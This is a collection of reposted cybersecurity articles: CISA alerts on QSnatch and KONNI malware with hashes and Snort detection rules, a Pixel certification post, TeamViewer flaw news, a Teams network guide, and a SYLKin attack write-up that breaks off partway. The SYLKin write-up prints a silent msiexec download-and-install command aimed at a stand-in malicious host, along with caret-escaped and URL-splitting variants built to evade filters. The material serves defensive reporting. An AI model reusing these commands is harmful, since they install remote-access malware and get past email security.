Category: Internet

Potential Legacy Risk from Malware Targeting QNAP NAS Devices

Summary

This is a joint alert from the United States Cybersecurity and Infrastructure Security Agency (CISA) and the United Kingdom’s National Cyber Security Centre (NCSC).

CISA and NCSC are investigating a strain of malware known as QSnatch, which attackers used in late 2019 to target Network Attached Storage (NAS) devices manufactured by the firm QNAP.  

All QNAP NAS devices are potentially vulnerable to QSnatch malware if not updated with the latest security fixes. The malware, documented in open-source reports, has infected thousands of devices worldwide with a particularly high number of infections in North America and Europe. Further, once a device has been infected, attackers can prevent administrators from successfully running firmware updates.

This alert summarizes the findings of CISA and NCSC analysis and provides mitigation advice.

Click here for a PDF version of this report from NCSC.

For a downloadable copy of IOCs, see STIX file.

Technical Details

Campaigns  

CISA and NCSC have identified two campaigns of activity for QSnatch malware. The first campaign likely began in early 2014 and continued until mid-2017, while the second started in late 2018 and was still active in late 2019. The two campaigns are distinguished by the initial payload used as well as some differences in capabilities. This alert focuses on the second campaign as it is the most recent threat.  

It is important to note that infrastructure used by the malicious cyber actors in both campaigns is not currently active, but the threat remains to unpatched devices.  

Although the identities and objectives of the malicious cyber actors using QSnatch are currently unknown, the malware is relatively sophisticated, and the cyber actors demonstrate an awareness of operational security.

Global distribution of infections  

Analysis shows a significant number of infected devices. In mid-June 2020, there were approximately 62,000 infected devices worldwide; of these, approximately 7,600 were in the United States and 3,900 were in the United Kingdom. Figure 1 below shows the location of these devices in broad geographic terms.

Figure 1: Locations of QNAP NAS devices infected by QSnatch

Delivery and exploitation

The infection vector has not been identified, but QSnatch appears to be injected into the device firmware during the infection stage, with the malicious code subsequently run within the device, compromising it. The attacker then uses a domain generation algorithm (DGA)—to establish a command and control (C2) channel that periodically generates multiple domain names for use in C2 communications—using the following HTTP GET request:

HTTP GET https://[generated-address]/qnap_firmware.xml?=t[timestamp][1]

Malware functionalities  

Analysis shows that QSnatch malware contains multiple functionalities, such as:  

  1. CGI password logger  
    • This installs a fake version of the device admin login page, logging successful authentications and passing them to the legitimate login page.
  2. Credential scraper
  3. SSH backdoor  
    • This allows the cyber actor to execute arbitrary code on a device.
  4. Exfiltration
    • When run, QSnatch steals a predetermined list of files, which includes system configurations and log files. These are encrypted with the actor’s public key and sent to their infrastructure over HTTPS.
  5. Webshell functionality for remote access

Persistence

The malware appears to gain persistence by preventing updates from installing on the infected QNAP device. The attacker modifies the system host’s file, redirecting core domain names used by the NAS to local out-of-date versions so updates can never be installed.  

Samples

The following tables provide hashes of related QSnatch samples found in open-source malware repositories. File types fall into two buckets: (1) shell scripts (see table 1) and (2) shell script compiler (SHC)-compiled executable and linking format (ELF) shell scripts (see table 2). One notable point is that some samples intentionally patch the infected QNAP for Samba remote code execution vulnerability CVE-2017-7494.  

Table 1: QSnatch samples – shell scripts

SH Samples (SHA256)
09ab3031796bea1b8b79fcfd2b86dac8f38b1f95f0fce6bd2590361f6dcd6764
3c38e7bb004b000bd90ad94446437096f46140292a138bfc9f7e44dc136bac8d
8fd16e639f99cdaa7a2b730fc9af34a203c41fb353eaa250a536a09caf78253b
473c5df2617cee5a1f73880c2d66ad9668eeb2e6c0c86a2e9e33757976391d1a
55b5671876f463f2f75db423b188a1d478a466c5e68e6f9d4f340396f6558b9f
9526ccdeb9bf7cfd9b34d290bdb49ab6a6acefc17bff0e85d9ebb46cca8b9dc2
4b514278a3ad03f5efb9488f41585458c7d42d0028e48f6e45c944047f3a15e9
fa3c2f8e3309ee67e7684abc6602eea0d1d18d5d799a266209ce594947269346
18a4f2e7847a2c4e3c9a949cc610044bde319184ef1f4d23a8053e5087ab641b
9791c5f567838f1705bd46e880e38e21e9f3400c353c2bf55a9fa9f130f3f077
a569332b52d484f40b910f2f0763b13c085c7d93dcdc7fea0aeb3a3e3366ba5d
a9364f3faffa71acb51b7035738cbd5e7438721b9d2be120e46b5fd3b23c6c18
62426146b8fcaeaf6abb24d42543c6374b5f51e06c32206ccb9042350b832ea8
5cb5dce0a1e03fc4d3ffc831e4a356bce80e928423b374fc80ee997e7c62d3f8
5130282cdb4e371b5b9257e6c992fb7c11243b2511a6d4185eafc0faa0e0a3a6
15892206207fdef1a60af17684ea18bcaa5434a1c7bdca55f460bb69abec0bdc
3cb052a7da6cda9609c32b5bafa11b76c2bb0f74b61277fecf464d3c0baeac0e
13f3ea4783a6c8d5ec0b0d342dcdd0de668694b9c1b533ce640ae4571fdbf63c

Table 2: QSnatch samples – SHC-compiled ELF shell scripts

SH Samples (SHA256)
18a4f2e7847a2c4e3c9a949cc610044bde319184ef1f4d23a8053e5087ab641b
3615f0019e9a64a78ccb57faa99380db0b36146ec62df768361bca2d9a5c27f2
845759bb54b992a6abcbca4af9662e94794b8d7c87063387b05034ce779f7d52
6e0f793025537edf285c5749b3fcd83a689db0f1c697abe70561399938380f89

Mitigations

As stated above, once a device has been infected, attackers have been known to make it impossible for administrators to successfully run the needed firmware updates. This makes it extremely important for organizations to ensure their devices have not been previously compromised. Organizations that are still running a vulnerable version should take the following steps to ensure the device is not left vulnerable:

  1. Scan the device with the latest version of Malware Remover, available in QNAP App Center, to detect and remove QSnatch or other malware.
  2. Run a full factory reset on the device.
  3. Update the firmware to the latest version.

The usual checks to ensure that the latest updates are installed still apply. To prevent reinfection, this recommendation also applies to devices previously infected with QSnatch but from which the malware has been removed.

To prevent QSnatch malware infections, CISA and NCSC strongly recommend that organizations take the recommended measures in QNAP’s November 2019 advisory.[2]

CISA and NCSC also recommend organizations consider the following mitigations:  

  1. Verify that you purchased QNAP devices from reputable sources.  
    • If sources are in question then, in accordance with the instructions above, scan the device with the latest version of the Malware Remover and run a full factory reset on the device prior to completing the firmware upgrade. For additional supply chain recommendations, see CISA’s tip on Securing Network Infrastructure Devices.
  2. Block external connections when the device is intended to be used strictly for internal storage.

References

[1] QSnatch – Malware designed for QNAP NAS devices[2] QNAP: Security Advisory for Malware QSnatch

Revisions

July 27, 2020: Initial VersionAugust 4, 2020: Updated Mitigations sectionAugust 6, 2020: Updated Mitigations section

Alert (AA20-209A)

Source :
https://us-cert.cisa.gov/ncas/alerts/aa20-209a

Phishing Emails Used to Deploy KONNI Malware

Summary

This Alert uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK®) framework. See the ATT&CK for Enterprise framework for all referenced threat actor techniques.

The Cybersecurity and Infrastructure Security Agency (CISA) has observed cyber actors using emails containing a Microsoft Word document with a malicious Visual Basic Application (VBA) macro code to deploy KONNI malware. KONNI is a remote administration tool (RAT) used by malicious cyber actors to steal files, capture keystrokes, take screenshots, and execute arbitrary code on infected hosts.

Technical Details

KONNI malware is often delivered via phishing emails as a Microsoft Word document with a malicious VBA macro code (Phishing: Spearphising Attachment [T1566.001]). The malicious code can change the font color from light grey to black (to fool the user to enable content), check if the Windows operating system is a 32-bit or 64-bit version, and construct and execute the command line to download additional files (Command and Scripting Interpreter: Windows Command Shell [T1059.003]).

Once the VBA macro constructs the command line, it uses the certificate database tool CertUtil to download remote files from a given Uniform Resource Locator. It also incorporates a built-in function to decode base64-encoded files. The Command Prompt silently copies certutil.exe into a temp directory and renames it to evade detection.

The cyber actor then downloads a text file from a remote resource containing a base64-encoded string that is decoded by CertUtil and saved as a batch (.BAT) file. Finally, the cyber actor deletes the text file from the temp directory and executes the .BAT file.

MITRE ATT&CK Techniques

According to MITRE, KONNI uses the ATT&CK techniques listed in table 1.

Table 1: KONNI ATT&CK techniques

TechniqueUse
System Network Configuration Discovery [T1016]KONNI can collect the Internet Protocol address from the victim’s machine.
System Owner/User Discovery [T1033]KONNI can collect the username from the victim’s machine.
Masquerading: Match Legitimate Name or Location [T1036.005]KONNI creates a shortcut called Anti virus service.lnk in an apparent attempt to masquerade as a legitimate file.
Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol [T1048.003]KONNI has used File Transfer Protocol to exfiltrate reconnaissance data out.
Input Capture: Keylogging  [T1056.001]KONNI has the capability to perform keylogging.
Process Discovery [T1057]KONNI has used tasklist.exe to get a snapshot of the current processes’ state of the target machine.
Command and Scripting Interpreter: PowerShell [T1059.001]KONNI used PowerShell to download and execute a specific 64-bit version of the malware.
Command and Scripting Interpreter: Windows Command Shell  [T1059.003]KONNI has used cmd.exe to execute arbitrary commands on the infected host across different stages of the infection change.
Indicator Removal on Host: File Deletion [T1070.004]KONNI can delete files.
Application Layer Protocol: Web Protocols [T1071.001]KONNI has used Hypertext Transfer Protocol for command and control.
System Information Discovery [T1082]KONNI can gather the operating system version, architecture information, connected drives, hostname, and computer name from the victim’s machine and has used systeminfo.exe to get a snapshot of the current system state of the target machine.
File and Directory Discovery [T1083]A version of KONNI searches for filenames created with a previous version of the malware, suggesting different versions targeted the same victims and the versions may work together.
Ingress Tool Transfer [T1105]KONNI can download files and execute them on the victim’s machine.
Modify Registry [T1112]KONNI has modified registry keys of ComSysApp service and Svchost on the machine to gain persistence.
Screen Capture [T1113]KONNI can take screenshots of the victim’s machine.
Clipboard Data [T1115]KONNI had a feature to steal data from the clipboard.
Data Encoding: Standard Encoding [T1132.001]KONNI has used a custom base64 key to encode stolen data before exfiltration.
Access Token Manipulation: Create Process with Token [T1134.002]KONNI has duplicated the token of a high integrity process to spawn an instance of cmd.exe under an impersonated user.
Deobfuscate/Decode Files or Information [T1140]KONNI has used CertUtil to download and decode base64 encoded strings.
Signed Binary Proxy Execution: Rundll32 [T1218.011]KONNI has used Rundll32 to execute its loader for privilege escalation purposes.
Event Triggered Execution: Component Object Model Hijacking [T1546.015]KONNI has modified ComSysApp service to load the malicious DLL payload.
Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder [T1547.001]A version of KONNI drops a Windows shortcut into the Startup folder to establish persistence.
Boot or Logon Autostart Execution: Shortcut Modification [T1547.009]A version of KONNI drops a Windows shortcut on the victim’s machine to establish persistence.
Abuse Elevation Control Mechanism: Bypass User Access Control [T1548.002]KONNI bypassed User Account Control with the “AlwaysNotify” settings.
Credentials from Password Stores: Credentials from Web Browsers [T1555.003]KONNI can steal profiles (containing credential information) from Firefox, Chrome, and Opera.

Detection

Signatures

CISA developed the following Snort signatures for use in detecting KONNI malware exploits.

alert tcp any any -> any $HTTP_PORTS (msg:"HTTP URI contains '/weget/*.php' (KONNI)"; sid:1; rev:1; flow:established,to_server; content:"/weget/"; http_uri; depth:7; offset:0; fast_pattern; content:".php"; http_uri; distance:0; within:12; content:!"Referrer|3a 20|"; http_header; classtype:http-uri; priority:2; metadata:service http;)

alert tcp any any -> any $HTTP_PORTS (msg:"KONNI:HTTP header contains 'User-Agent|3a 20|HTTP|0d 0a|'"; sid:1; rev:1; flow:established,to_server; content:"User-Agent|3a 20|HTTP|0d 0a|"; http_header; fast_pattern:only; content:"POST"; nocase; http_method; classtype:http-header; priority:2; metadata:service http;)

alert tcp any any -> any $HTTP_PORTS (msg:"KONNI:HTTP URI contains '/weget/(upload|uploadtm|download)'"; sid:1; rev:1; flow:established,to_server; content:"/weget/"; http_uri; fast_pattern:only; pcre:"/^\/weget\x2f(?:upload|uploadtm|download)\.php/iU"; content:"POST"; http_method; classtype:http-uri; priority:2; reference:url,blog.talosintelligence.com/2017/07/konni-references-north-korean-missile-capabilities.html; metadata:service http;)

Mitigations

CISA recommends that users and administrators consider using the following best practices to strengthen the security posture of their organization’s systems. Any configuration changes should be reviewed by system owners and administrators prior to implementation to avoid unwanted impacts.

  1. Maintain up-to-date antivirus signatures and engines. See Protecting Against Malicious Code.
  2. Keep operating system patches up to date. See Understanding Patches and Software Updates.
  3. Disable file and printer sharing services. If these services are required, use strong passwords or Active Directory authentication.
  4. Restrict users’ ability (permissions) to install and run unwanted software applications. Do not add users to the local administrators’ group unless required.
  5. Enforce a strong password policy. See Choosing and Protecting Passwords.
  6. Exercise caution when opening email attachments, even if the attachment is expected and the sender appears to be known. See Using Caution with Email Attachments.
  7. Enable a personal firewall on agency workstations, configured to deny unsolicited connection requests.
  8. Disable unnecessary services on agency workstations and servers.
  9. Scan for and remove suspicious email attachments; ensure the scanned attachment is its “true file type” (i.e., the extension matches the file header).
  10. Monitor users’ web browsing habits; restrict access to sites with unfavorable content.
  11. Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs).
  12.  Scan all software downloaded from the internet prior to executing.
  13. Maintain situational awareness of the latest threats and implement appropriate access control lists.
  14. Visit the MITRE ATT&CK Techniques pages (linked in table 1 above) for additional mitigation and detection strategies.

For additional information on malware incident prevention and handling, see the National Institute of Standards and Technology Special Publication 800-83, “Guide to Malware Incident Prevention and Handling for Desktops and Laptops.”

Resources

  1. d-hunter – A Look Into KONNI 2019 Campaign
  2. MITRE ATT&CK – KONNI
  3. MITRE ATT&CK for Enterprise

Alert (AA20-227A)

Source :
https://us-cert.cisa.gov/ncas/alerts/aa20-227a

Google Pixel 4a is the first device to go through ioXt at launch

Trust is very important when it comes to the relationship between a user and their smartphone. While phone functionality and design can enhance the user experience, security is fundamental and foundational to our relationship with our phones.There are multiple ways to build trust around the security capabilities that a device provides and we continue to invest in verifiable ways to do just that.

Pixel 4a ioXt certification

Today we are happy to announce that the Pixel 4/4 XL and the newly launched Pixel 4a are the first Android smartphones to go through ioXt certification against the Android Profile.

The Internet of Secure Things Alliance (ioXt) manages a security compliance assessment program for connected devices. ioXt has over 200 members across various industries, including Google, Amazon, Facebook, T-Mobile, Comcast, Zigbee Alliance, Z-Wave Alliance, Legrand, Resideo, Schneider Electric, and many others. With so many companies involved, ioXt covers a wide range of device types, including smart lighting, smart speakers, webcams, and Android smartphones.

The core focus of ioXt is “to set security standards that bring security, upgradability and transparency to the market and directly into the hands of consumers.” This is accomplished by assessing devices against a baseline set of requirements and relying on publicly available evidence. The goal of ioXt’s approach is to enable users, enterprises, regulators, and other stakeholders to understand the security in connected products to drive better awareness towards how these products are protecting the security and privacy of users.

ioXt’s baseline security requirements are tailored for product classes, and the ioXt Android Profile enables smartphone manufacturers to differentiate security capabilities, including biometric authentication strength, security update frequency, length of security support lifetime commitment, vulnerability disclosure program quality, and preloaded app risk minimization.

We believe that using a widely known industry consortium standard for Pixel certification provides increased trust in the security claims we make to our users. NCC Group has published an audit report that can be downloaded here. The report documents the evaluation of Pixel 4/4 XL and Pixel 4a against the ioXt Android Profile.

Security by Default is one of the most important criteria used in the ioXt Android profile. Security by Default rates devices by cumulatively scoring the risk for all preloads on a particular device. For this particular measurement, we worked with a team of university experts from the University of Cambridge, University of Strathclyde, and Johannes Kepler University in Linz to create a formula that considers the risk of platform signed apps, pregranted permissions on preloaded apps, and apps communicating using cleartext traffic.

Screenshot of the presentation of the Android Device Security Database at the Android Security Symposium 2020

In partnership with those teams, Google created Uraniborg, an open source tool that collects necessary attributes from the device and runs it through this formula to come up with a raw score. NCC Group leveraged Uraniborg to conduct the assessment for the ioXt Security by Default category.

As part of our ongoing certification efforts, we look forward to submitting future Pixel smartphones through the ioXt standard, and we encourage the Android device ecosystem to participate in similar transparency efforts for their devices.

Acknowledgements: This post leveraged contributions from Sudhi Herle, Billy Lau and Sam Schumacher

Source :
https://security.googleblog.com/2020/08/pixel-4a-is-first-device-to-go-through.html

TeamViewer Flaw Could Let Hackers Steal System Password Remotely

If you are using TeamViewer, then beware and make sure you’re running the latest version of the popular remote desktop connection software for Windows.

TeamViewer team recently released a new version of its software that includes a patch for a severe vulnerability (CVE 2020-13699), which, if exploited, could let remote attackers steal your system password and eventually compromise it.

What’s more worrisome is that the attack can be executed almost automatically without requiring much interaction of the victims and just by convincing them to visit a malicious web page once.

For those unaware, TeamViewer is a popular remote-support software that allows users to securely share their desktop or take full control of other’s PC over the Internet from anywhere in the world.

The remote access software is available for desktop and mobile operating systems, including Windows, macOS, Linux, Chrome OS, iOS, Android, Windows RT Windows Phone 8, and BlackBerry.

Discovered by Jeffrey Hofmann of Praetorian, the newly reported high-risk vulnerability resides in the way TeamViewer quotes its custom URI handlers, which could allow an attacker to force the software to relay an NTLM authentication request to the attacker’s system.

In simple terms, an attacker can leverage TeamViewer’s URI scheme from a web-page to trick the application installed on the victim’s system into initiating a connection to the attacker-owned remote SMB share.

windows password hacking

This, in turn, triggers the SMB authentication attack, leaks the system’s username, and NTLMv2 hashed version of the password to the attackers, allowing them to use stolen credentials to authenticate the victims’ computer or network resources.

To successfully exploit the vulnerability, an attacker needs to embed a malicious iframe on a website and then trick victims into visiting that maliciously crafted URL. Once clicked by the victim, TeamViewer will automatically launch its Windows desktop client and open a remote SMB share.

Now, the victim’s Windows OS will “perform NTLM authentication when opening the SMB share and that request can be relayed (using a tool like responder) for code execution (or captured for hash cracking).”

This vulnerability, categorized as ‘Unquoted URI handler,’ affects “URI handlers teamviewer10, teamviewer8, teamviewerapi, tvchat1, tvcontrol1, tvfiletransfer1, tvjoinv8, tvpresent1, tvsendfile1, tvsqcustomer1, tvsqsupport1, tvvideocall1, and tvvpn1,” Hofmann said.

The TeamViewer project has patched the vulnerability by quoting the parameters passed by the affected URI handlers e.g., URL:teamviewer10 Protocol “C:\Program Files (x86)\TeamViewer\TeamViewer.exe” “%1”

Though the vulnerability is not being exploited in the wild as of now, considering the popularity of the software among millions of users, TeamViewer has always been a target of interest for attackers.

So, users are highly recommended to upgrade their software to the 15.8.3, as it’s hardly a matter of time before hackers started exploiting the flaw to hack into users’ Windows PCs.

A similar SMB-authentication attack vector was previously disclosed in Google ChromeZoom video conferencing app, and Signal messenger.

Source :
https://thehackernews.com/2020/08/teamviewer-password-hacking.html

Prepare your organization’s network for Microsoft Teams

Network requirements

If you’ve already optimized your network for Microsoft 365 or Office 365, you’re probably ready for Microsoft Teams. In any case – and especially if you’re rolling out Teams quickly as your first Microsoft 365 or Office 365 workload to support remote workers – check the following before you begin your Teams rollout:

  1. Do all your locations have internet access (so they can connect to Microsoft 365 or Office 365)? At a minimum, in addition to normal web traffic, make sure you’ve opened the following, for all locations, for media in Teams:TABLE 1PortsUDP ports 3478 through 3481IP addresses13.107.64.0/1852.112.0.0/14, and 52.120.0.0/14

 Important

If you need to federate with Skype for Business, either on-premises or online, you will need to configure some additional DNS records.

CNAME Records / Host nameTTLPoints to address or value
sip3600sipdir.online.lync.com
lyncdiscover3600webdir.online.lync.com
  1. Do you have a verified domain for Microsoft 365 or Office 365 (for example, contoso.com)?
    • If your organization hasn’t rolled out Microsoft 365 or Office 365, see Get started.
    • If your organization hasn’t added or configured a verified domain for Microsoft 365 or Office 365, see the Domains FAQ.
  2. Has your organization deployed Exchange Online and SharePoint Online?

Once you’ve verified that you meet these network requirements, you may be ready to Roll out Teams. If you’re a large multinational enterprise, or if you know you’ve got some network limitations, read on to learn how to assess and optimize your network for Teams.

 Important

For educational institutions: If your organization is an educational institution and you use a Student Information System (SIS), deploy School Data Sync before you roll out Teams.

Running on-premises Skype for Business Server: If your organization is running on-premises Skype for Business Server (or Lync Server), you must configure Azure AD Connect to synchronize your on-premises directory with Microsoft 365 or Office 365.

Best practice: Monitor your network using CQD and call analytics

Use the Call Quality Dashboard (CQD) to gain insight into the quality of calls and meetings in Teams. CQD can help you optimize your network by keeping a close eye on quality, reliability, and the user experience. CQD looks at aggregate telemetry for an entire organization where overall patterns can become apparent, which lets you identify problems and plan remediation. Additionally, CQD provides rich metrics reports that provide insight into overall quality, reliability, and user experience.

You’ll use call analytics to investigate call and meeting problems for an individual user.

Network optimization

The following tasks are optional and aren’t required for rolling out Teams, especially if you’re a small business and you’ve already rolled out Microsoft 365 or Office 365. Use this guidance to optimize your network and Teams performance or if you know you’ve got some network limitations.

You might want to do additional network optimization if:

  1. Teams runs slowly (maybe you have insufficient bandwidth)
  2. Calls keep dropping (might be due to firewall or proxy blockers)
  3. Calls have static and cut out, or voices sound like robots (could be jitter or packet loss)

For an in-depth discussion of network optimization, including guidance for identifying and fixing network impairments, read Microsoft 365 and Office 365 Network Connectivity Principles.

Network optimization taskDetails
Network plannerFor help assessing your network, including bandwidth calculations and network requirements across your org’s physical locations, check out the Network Planner tool, in the Teams admin center. When you provide your network details and Teams usage, the Network Planner calculates your network requirements for deploying Teams and cloud voice across your organization’s physical locations.For an example scenario, see Using Network Planner – example scenario.
Advisor for TeamsAdvisor for Teams is part of the Teams admin center. It assesses your Microsoft 365 or Office 365 environment and identifies the most common configurations that you may need to update or modify before you can successfully roll out Teams.
External Name ResolutionBe sure that all computers running the Teams client can resolve external DNS queries to discover the services provided by Microsoft 365 or Office 365 and that your firewalls are not preventing access. For information about configuring firewall ports, go to Microsoft 365 and Office 365 URLs and IP ranges.
Maintain session persistenceMake sure your firewall doesn’t change the mapped Network Address Translation (NAT) addresses or ports for UDP.
Validate NAT pool sizeValidate the network address translation (NAT) pool size required for user connectivity. When multiple users and devices access Microsoft 365 or Office 365 using Network Address Translation (NAT) or Port Address Translation (PAT), you need to ensure that the devices hidden behind each publicly routable IP address do not exceed the supported number. Ensure that adequate public IP addresses are assigned to the NAT pools to prevent port exhaustion. Port exhaustion will contribute to internal users and devices being unable to connect to the Microsoft 365 or Office 365 service.
Routing to Microsoft data centersImplement the most efficient routing to Microsoft data centers. Identify locations that can use local or regional egress points to connect to the Microsoft network as efficiently as possible.
Intrusion Detection and Prevention GuidanceIf your environment has an Intrusion Detection or Prevention System (IDS/IPS) deployed for an extra layer of security for outbound connections, be sure to allow all Microsoft 365 or Office 365 URLs.
Configure split-tunnel VPNWe recommend that you provide an alternate path for Teams traffic that bypasses the virtual private network (VPN), commonly known as [split-tunnel VPN](https://docs.microsoft.com/windows/security/identity-protection/vpn/vpn-routing). Split tunneling means that traffic for Microsoft 365 or Office 365 doesn’t go through the VPN but instead goes directly to Microsoft 365 or Office 365. Bypassing your VPN will have a positive impact on Teams quality, and it reduces load from the VPN devices and the organization’s network. To implement a split-tunnel VPN, work with your VPN vendor.Other reasons why we recommend bypassing the VPN:VPNs are typically not designed or configured to support real-time media.Some VPNs might also not support UDP (which is required for Teams).VPNs also introduce an extra layer of encryption on top of media traffic that’s already encrypted.Connectivity to Teams might not be efficient due to hair-pinning traffic through a VPN device.
Implement QoSUse Quality of Service (QoS) to configure packet prioritization. This will improve call quality in Teams and help you monitor and troubleshoot call quality. QoS should be implemented on all segments of a managed network. Even when a network has been adequately provisioned for bandwidth, QoS provides risk mitigation in the event of unanticipated network events. With QoS, voice traffic is prioritized so that these unanticipated events don’t negatively affect quality.
Optimize WiFiSimilar to VPN, WiFi networks aren’t necessarily designed or configured to support real-time media. Planning for, or optimizing, a WiFi network to support Teams is an important consideration for a high-quality deployment. Consider these factors:Implement QoS or WiFi Multimedia (WMM) to ensure that media traffic is getting prioritized appropriately over your WiFi networks.Plan and optimize the WiFi bands and access point placement. The 2.4 GHz range might provide an adequate experience depending on access point placement, but access points are often affected by other consumer devices that operate in that range. The 5 GHz range is better suited to real-time media due to its dense range, but it requires more access points to get sufficient coverage. Endpoints also need to support that range and be configured to leverage those bands accordingly.If you’re using dual-band WiFi networks, consider implementing band steering. Band steering is a technique implemented by WiFi vendors to influence dual-band clients to use the 5 GHz range.When access points of the same channel are too close together, they can cause signal overlap and unintentionally compete, resulting in a bad experience for the user. Ensure that access points that are next to each other are on channels that don’t overlap.Each wireless vendor has its own recommendations for deploying its wireless solution. Consult your WiFi vendor for specific guidance.

Bandwidth requirements

Teams is designed to give the best audio, video, and content sharing experience regardless of your network conditions. That said, when bandwidth is insufficient, Teams prioritizes audio quality over video quality.

Where bandwidth isn’t limited, Teams optimizes media quality, including up to 1080p video resolution, up to 30fps for video and 15fps for content, and high-fidelity audio.

This table describes how Teams uses bandwidth. Teams is always conservative on bandwidth utilization and can deliver HD video quality in under 1.2Mbps. The actual bandwidth consumption in each audio/video call or meeting will vary based on several factors, such as video layout, video resolution, and video frames per second. When more bandwidth is available, quality and usage will increase to deliver the best experience.

Bandwidth(up/down)Scenarios
30 kbpsPeer-to-peer audio calling
130 kbpsPeer-to-peer audio calling and screen sharing
500 kbpsPeer-to-peer quality video calling 360p at 30fps
1.2 MbpsPeer-to-peer HD quality video calling with resolution of HD 720p at 30fps
1.5 MbpsPeer-to-peer HD quality video calling with resolution of HD 1080p at 30fps
500kbps/1MbpsGroup Video calling
1Mbps/2MbpsHD Group video calling (540p videos on 1080p screen)

Microsoft 365 and Office 365 Network Connectivity Principles

Worldwide endpoints: Skype for Business Online and Teams

Proxy servers for Teams

Media in Teams: Why meetings are simple

Media in Teams: Deep dive into media flows

Identity models and authentication in Teams

How to roll out Teams

Teams Troubleshooting

Source :
https://docs.microsoft.com/en-us/microsoftteams/prepare-network

Protect Against SYLKin Attack with SonicWall Cloud App Security

With the definition of normal changing with each passing day, the ongoing pandemic has forced security professionals to re-evaluate new working models and how they can prevent attackers from targeting end users. Albert Einstein once said, “In the midst of every crisis lies great opportunity,” and this idea has formed the basis for how cybercriminals operate in the era of COVID-19.

Never ones to let an opportunity go to waste, cybercriminals are deploying new attacks each day. Microsoft was recently affected by a new SYLKIN Attack that bypasses both Microsoft 365 default security (EOP) and Microsoft advanced security (ATP). At the time of writing, Microsoft 365 is still vulnerable, and the attack is still being used extensively against Microsoft 365 customers.

Lately Avanan’s security analysts have detected a significant increase in the usage of SLK files in attacks against Microsoft 365 customers. In these attacks, hackers send an email with a .slk attachment that contains a malicious macro (msiexec script) to download and install a remote access trojan.

It is a very sophisticated attack with several obfuscation methods specifically designed to bypass Microsoft 365. Gmail customers, on other hand, are safe from this attack — Google already blocks it on incoming email and has made it impossible to send these SLK files as an attachment from a Gmail account.

What is SYLKin attack?

Again, SLK files are rare, so if you have received one in your inbox, chances are you are being targeted by the most recent Remote Access Trojan malware that has been ‘upgraded’ to bypass Microsoft ATP. The attack method itself has been extensively documented, so I’ll only explain it briefly. The focus will be on how such a well-understood attack bypassed Office 365 filters, including Microsoft ATP.

The attack specifically targets Microsoft 365 accounts and until recently, was isolated to a small number of organizations.

Emails are targeted and manually created

The attack emails are highly customized, using information and language that could only have been found and written manually. The messages seem to come from a partner or customer using a topic that is highly specific to the organization and the individual. For example, an email to a manufacturer will discuss parts specifications, an email to a tech firm will ask for changes to a large electronics order, or an email to a government department will discuss legal concerns. The subjects, contents and even the attached files are customized with the target’s name and organization. No two are alike. What they have in common is that the messages are realistic and compelling enough to convince a user to click on the attached SLK file.

What is a SLK file?

A so-called “Symbolic Link” (SLK) file is Microsoft’s human-readable, text-based spreadsheet format that saw its last update around the time that “Dallas” went off the air in 1986. At a time when XLS files were proprietary, SLK was an open-format alternative before XLSX was introduced in 2007. To the end user, a SLK file looks like an Excel document — but for an attacker,  it’s an easy way to bypass Microsoft 365 security, even for accounts protected with Microsoft ATP.

What does this attack do?

A recent version of the SYLK attack includes an SLK file with an obfuscated macro designed to run a command on a Windows machine:

msiexec /i http://malicious-site.com/install.php /q

This runs Windows Installer (msiexec) in quiet mode to install whatever MSI package they decide to host on their site. In this campaign, it’s a hacked version of the off-the-shelf NetSupport remote control application, granting the attacker full control over the desktop.

Windows grants more trust to SLK files than XLSX files

Because Windows “Protected View” does not apply to SLK files downloaded from the Internet or from email, Excel does not open them in read-only mode.

When opening an SLK file, the end user does not see this message:

Targeted methodology to bypass Microsoft Advanced Threat Protection

The first versions of the SLK attack method were seen in 2018 and were eventually blocked by Microsoft ATP. This new campaign, however, includes a number of obfuscation techniques specifically designed to bypass Microsoft ATP.

  1. The attack was sent from hundreds of free hotmail accounts
  2. The macro script includes ‘^’ characters to confuse ATP filters.
  3. The URL was split in two so that ATP would not read it as a web link,
  4. The hosting server became active after the email was sent so it seemed benign if sandboxed by ATP,
  5. The hosting server only responded to “Windows Installer” user agents, ignoring other queries.

These methods are ATP-specific. Again, Gmail blocks these files and, in fact, makes it impossible to send from a Gmail account.

The attackers took advantage of a series of blind spots in the Microsoft email infrastructure to send this attack from thousands of disposable Hotmail accounts, with email addresses in the format “randomwords1982@hotmail.com,” each sending just a handful or messages at a time.

An important benefit of Hotmail to many attackers is that the same security filters are being used end to end. If the attacker is able to attach and send a file, it is likely that it will make it through the entire Microsoft security infrastructure. Should one of the accounts get flagged, Microsoft will disable it, informing the attacker that his messages are getting caught downstream.

While most of the well-known anonymous email-sending engines deserve their poor spam and phishing reputations, Hotmail users benefit from Microsoft’s own reputation. Since the service was merged with its own Outlook application, Microsoft seems to grant them a higher level of trust than external senders.

The macro script includes escape characters to confuse ATP filters

The attackers take advantage of the fact that ATP filters do not interpret text in the same way as the Windows command line. ATP would normally be able to identify the powerful and potentially malicious msiexec command, but the attackers inserted command-line escape characters ‘^’ to obfuscate the script.

msiexec /i http://malicious-site.com/install.php /q

becomes

M^s^ie^xec /ih^tt^p^:^/^/malicious-site.com/install.php ^/q

When read by Advanced Threat Protection filters, the msiexec command becomes unreadable and the telltale ‘http://’ is obscured.

When read by the desktop command line, the escape characters ‘disappear,’ running as if they were never there. This is just a command-line version of the Zero-Font methodologies that have plagued ATP for years.

The URL was split into two macros so that ATP would not read it as a link

ATP does not need to see the ‘http://’ to recognize a web link and would normally catch any text of the format ‘malicious-site.com.’ In order to hide the link, the attackers split it into two separate commands.

The first macro command creates a batch file with the first half of the URL.

Set /p=””M^s^ie^xec /ih^tt^p^:^/^/malicious-sit”” > JbfoT.bat

The second macro command adds the remainder of the URL and then runs the batch file.

Set /p=””e.com/install.php ^/q”” >> JbfoT.bat & JbfoT.bat

Within seconds, the malicious SLK file has run two simple commands to create a malicious install script and begin installing whatever software the attackers decide to host.

The hosting server was armed after the message was sent

We don’t believe Microsoft ATP is testing these files within their sandbox environment, relying instead on static filters. But we have found that other vendors have also failed to catch this attack, even when the code is executed in a virtual environment.

There is no special code or intelligence within the script to detect if it is running within emulation. Instead, the attackers do not enable the malicious web server until shortly after the email is sent. Because it cannot reach the server, the script fails, installing nothing.

